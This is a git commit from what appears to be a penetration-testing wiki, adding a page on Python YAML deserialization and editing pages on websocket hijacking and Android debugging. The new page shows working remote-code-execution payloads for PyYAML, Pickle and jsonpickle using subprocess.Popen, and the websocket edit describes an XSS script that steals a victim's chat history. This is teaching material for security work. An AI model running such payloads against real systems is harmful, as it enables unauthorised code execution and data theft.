GitBook: [#2846] python yaml deserialization
This commit is contained in:
parent
39fe2c8470
commit
32628dd460
BIN
.gitbook/assets/image (628) (1) (1).png
Normal file
BIN
.gitbook/assets/image (628) (1) (1).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 27 KiB |
Binary file not shown.
Before Width: | Height: | Size: 27 KiB After Width: | Height: | Size: 304 KiB |
Binary file not shown.
Before Width: | Height: | Size: 304 KiB After Width: | Height: | Size: 212 KiB |
@ -388,6 +388,7 @@
|
||||
* [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)](pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)
|
||||
* [Exploiting \_\_VIEWSTATE knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-knowing-the-secret.md)
|
||||
* [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-parameter.md)
|
||||
* [Python Yaml Deserialization](pentesting-web/deserialization/python-yaml-deserialization.md)
|
||||
* [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)
|
||||
* [Email Header Injection](pentesting-web/email-header-injection.md)
|
||||
* [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md)
|
||||
|
@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these
|
||||
|
||||
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
|
||||
|
||||
![](<../../.gitbook/assets/image (628) (1).png>)
|
||||
![](<../../.gitbook/assets/image (628) (1) (1).png>)
|
||||
|
||||
The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:
|
||||
|
||||
|
@ -83,7 +83,9 @@ An attacker can create a **malicious web page** on their own domain which **esta
|
||||
|
||||
### Simple Attack
|
||||
|
||||
This attack allows you to make the client connect to websocket server and send some predefined value.
|
||||
Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. 
|
||||
|
||||
Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.:
|
||||
|
||||
```markup
|
||||
<script>
|
||||
@ -100,8 +102,6 @@ function handleReply(event) {
|
||||
</script>
|
||||
```
|
||||
|
||||
Usually this will be useless as what you want is to get the information the real user is sending and the responses.
|
||||
|
||||
### Stealing data from user
|
||||
|
||||
Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code:
|
||||
|
@ -130,6 +130,14 @@ For more information about escaping from **pickle jails** check:
|
||||
[bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Yaml** & **jsonpickle
|
||||
|
||||
The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**:
|
||||
|
||||
{% content-ref url="python-yaml-deserialization.md" %}
|
||||
[python-yaml-deserialization.md](python-yaml-deserialization.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## NodeJS
|
||||
|
||||
### `__proto__` and `prototype` pollution
|
||||
|
123
pentesting-web/deserialization/python-yaml-deserialization.md
Normal file
123
pentesting-web/deserialization/python-yaml-deserialization.md
Normal file
@ -0,0 +1,123 @@
|
||||
# Python Yaml Deserialization
|
||||
|
||||
## Yaml **Deserialization**
|
||||
|
||||
**Yaml **python libraries is also capable to** serialize python objects** and not just raw data:
|
||||
|
||||
```
|
||||
print(yaml.dump(str("lol")))
|
||||
lol
|
||||
...
|
||||
|
||||
print(yaml.dump(tuple("lol")))
|
||||
!!python/tuple
|
||||
- l
|
||||
- o
|
||||
- l
|
||||
|
||||
print(yaml.dump(range(1,10)))
|
||||
!!python/object/apply:builtins.range
|
||||
- 1
|
||||
- 10
|
||||
- 1
|
||||
```
|
||||
|
||||
Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).
|
||||
|
||||
![](<../../.gitbook/assets/image (628).png>)
|
||||
|
||||
**safe\_load()** or **safe\_load\_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example:
|
||||
|
||||
```python
|
||||
import yaml
|
||||
from yaml import UnsafeLoader, FullLoader, Loader
|
||||
data = b'!!python/object/apply:builtins.range [1, 10, 1]'
|
||||
|
||||
print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
|
||||
print(yaml.load(data, Loader=Loader)) #range(1, 10)
|
||||
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
||||
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
|
||||
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
|
||||
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
|
||||
print(yaml.unsafe_load(data)) #range(1, 10)
|
||||
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
||||
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
|
||||
|
||||
#The other ways to load data will through an error as they won't even attempt to
|
||||
#deserialize the python object
|
||||
```
|
||||
|
||||
The previous code used **unsafe\_load **to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader.
|
||||
|
||||
### Basic Exploit
|
||||
|
||||
Example on how to **execute a sleep**:
|
||||
|
||||
```python
|
||||
import yaml
|
||||
from yaml import UnsafeLoader, FullLoader, Loader
|
||||
data = b'!!python/object/apply:time.sleep [2]'
|
||||
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
|
||||
print(yaml.load(data, Loader=Loader)) #Executed
|
||||
print(yaml.load_all(data))
|
||||
print(yaml.load_all(data, Loader=Loader))
|
||||
print(yaml.load_all(data, Loader=UnsafeLoader))
|
||||
print(yaml.load_all(data, Loader=FullLoader))
|
||||
print(yaml.unsafe_load(data)) #Executed
|
||||
print(yaml.full_load_all(data))
|
||||
print(yaml.unsafe_load_all(data))
|
||||
```
|
||||
|
||||
## RCE
|
||||
|
||||
Kindly note payload creation can be done with **any python YAML module (PyYAML or ruamel.yaml), in the same way**. The same payload can exploit both YAML module or any module based on PyYAML or ruamel.yaml
|
||||
|
||||
```python
|
||||
import yaml
|
||||
from yaml import UnsafeLoader, FullLoader, Loader
|
||||
import subprocess
|
||||
|
||||
class Payload(object):
|
||||
def __reduce__(self):
|
||||
return (subprocess.Popen,('ls',))
|
||||
|
||||
deserialized_data = yaml.dump(Payload()) # serializing data
|
||||
print(deserialized_data)
|
||||
|
||||
#!!python/object/apply:subprocess.Popen
|
||||
#- ls
|
||||
|
||||
print(yaml.load(deserialized_data, Loader=UnsafeLoader))
|
||||
print(yaml.load(deserialized_data, Loader=Loader))
|
||||
print(yaml.unsafe_load(deserialized_data))
|
||||
```
|
||||
|
||||
### Tool to create Payloads
|
||||
|
||||
The tool [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:**
|
||||
|
||||
```bash
|
||||
python3 peas.py
|
||||
Enter RCE command :cat /root/flag.txt
|
||||
Enter operating system of target [linux/windows] . Default is linux :linux
|
||||
Want to base64 encode payload ? [N/y] :
|
||||
Enter File location and name to save :/tmp/example
|
||||
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
|
||||
Done Saving file !!!!
|
||||
|
||||
cat /tmp/example_jspick
|
||||
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}
|
||||
|
||||
cat /tmp/example_pick | base64 -w0
|
||||
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==
|
||||
|
||||
cat /tmp/example_yaml
|
||||
!!python/object/apply:subprocess.Popen
|
||||
- !!python/tuple
|
||||
- cat
|
||||
- /root/flag.txt
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
For more in depth information about this technique read: [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
|
@ -92,7 +92,7 @@ There could be another problem, if the **response** to the legit request **conta
|
||||
|
||||
However, the **HEAD** request **doesn't contain a body** but it usually **contains** the **Content-Length** as if the request was a GET request. Therefore, sending a **HEAD** request **instead of a POST** request you can **read the HEAD Content-Length** bytes of the smuggled request response.
|
||||
|
||||
![](<../../.gitbook/assets/image (628).png>)
|
||||
![](<../../.gitbook/assets/image (628) (1).png>)
|
||||
|
||||
### Leaking Internal Headers via Tunneling
|
||||
|
||||
|
@ -39,3 +39,7 @@ adb pull "/sdcard/com.package"
|
||||
```
|
||||
|
||||
You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).
|
||||
|
||||
## Shodan
|
||||
|
||||
* `android debug bridge`
|
||||
|
Loading…
Reference in New Issue
Block a user